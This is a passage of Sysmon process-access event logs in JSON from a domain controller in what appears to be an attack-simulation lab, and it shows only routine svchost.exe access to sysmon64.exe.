M32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1449,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.334\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.334","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1450,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1451,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1452,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1453,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1454,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1455,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:24","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1456,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:24.335\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:24.335","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:25","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
